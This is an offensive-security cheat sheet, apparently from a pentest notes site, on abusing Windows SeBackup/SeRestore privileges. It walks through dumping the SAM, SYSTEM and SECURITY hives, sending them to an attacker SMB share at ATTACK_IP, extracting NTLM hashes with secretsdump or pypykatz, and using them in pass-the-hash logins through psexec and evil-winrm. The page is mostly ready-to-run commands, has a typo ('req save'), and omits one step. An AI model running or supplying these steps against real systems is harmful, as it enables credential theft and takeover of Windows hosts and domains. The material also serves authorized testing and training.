Dump SAM and SYSTEM hives

Privileges: SeBackup/SeRestore

1: Backup SAM and SYSTEM hashes

cd /

mkdir temp

cd temp

req save hklm\system c:\temp\system

req save hklm\sam c:\temp\sam

download sam

download system

2: Create SMB Server on attacking machine

mkdir share

impacket-smbserver -smb2support -username USER -password PASSWORD public share

copy c:\users\user\sam.hive \\ATTACK_IP\public\

copy c:\users\user\system.hive \\ATTACK_IP\public\

4: Retrieve hashes

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

OR

pypykatz registry --sam sam system

5: Pass-The-Hash Attack (PtH)

impacket-psexec -hashes HASH administrator@TARGET_IP

TIP: We can also use evil-winrm for PtH attacks.

evil-winrm -i TARGET_IP -u administrator -H 'NTLM_HASH'

Alternate Method to transfer the Hives: reg.py remotely on Linux

python smbserver.py -smb2support share /tmp

reg.py "domain"/"backup_operator_username":"password"@"dc ip" save -keyName 'HKLM\SAM' -o '\\attacker ip\share'

reg.py "domain"/"backup_operator_username":"password"@"dc ip" save -keyName 'HKLM\SYSTEM' -o '\\attacker ip\share'

reg.py "domain"/"backup_operator_username":"password"@"dc ip" save -keyName 'HKLM\SECURITY' -o '\\attacker ip\share'

Alternate Method: SeBackupPrivilegeUtils https://github.com/giuliano108/SeBackupPrivilege

Usage:

Import-Module .\SeBackupPrivilegeUtils.dll

Import-Module .\SeBackupPrivilegeCmdLets.dll

Set-SeBackupPrivilege

Get-SeBackupPrivilege

Alternate Method: Robocopy

robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B

type C:\Users\Public\root.txt

Alternate Method: diskshadow.exe

Create a script for diskshadow to execute

cd /

mkdir temp

cd temp

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii

echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append

echo "create" | out-file ./diskshadow.txt -encoding ascii -append

echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append

dir

diskshadow.exe /s c:\temp\diskshadow.txt

Copy the SAM/SYSTEM/SECURITY hives to our temp folder

robocopy /b Z:\Windows\System32\Config C:\temp SAM

robocopy /b Z:\Windows\System32\Config C:\temp SYSTEM

robocopy /b Z:\Windows\System32\Config C:\temp SECURITY

Then download all of them to our machine

Dump hashes

1) Pypykatz

pypykatz registry --sam sam system

2) impacket-secretsdump

impacket-secretsdump -sam sam -system system LOCAL

PreviousDPAPI credentials extraction NextEnable All Tokens

Last updated 8 months ago

hashtagPrivileges: SeBackup/SeRestore

hashtag1: Backup SAM and SYSTEM hashes

hashtag2: Create SMB Server on attacking machine

hashtag3: Copy backups to share folder

hashtag4: Retrieve hashes

hashtagOR

hashtag5: Pass-The-Hash Attack (PtH)

hashtagTIP: We can also use evil-winrm for PtH attacks.

hashtagAlternate Method to transfer the Hives: reg.py remotely on Linux

hashtagAlternate Method: SeBackupPrivilegeUtils https://github.com/giuliano108/SeBackupPrivilege

hashtagUsage:

hashtagAlternate Method: Robocopy

hashtagAlternate Method: diskshadow.exe

hashtagCreate a script for diskshadow to execute

hashtagCopy the SAM/SYSTEM/SECURITY hives to our temp folder

hashtagThen download all of them to our machine

hashtagDump hashes

hashtag1) Pypykatz

hashtag2) impacket-secretsdump

Privileges: SeBackup/SeRestore

1: Backup SAM and SYSTEM hashes

2: Create SMB Server on attacking machine

3: Copy backups to share folder

4: Retrieve hashes

OR

5: Pass-The-Hash Attack (PtH)

TIP: We can also use evil-winrm for PtH attacks.

Alternate Method to transfer the Hives: reg.py remotely on Linux

Alternate Method: SeBackupPrivilegeUtils https://github.com/giuliano108/SeBackupPrivilege

Usage:

Alternate Method: Robocopy

Alternate Method: diskshadow.exe

Create a script for diskshadow to execute

Copy the SAM/SYSTEM/SECURITY hives to our temp folder

Then download all of them to our machine

Dump hashes

1) Pypykatz

2) impacket-secretsdump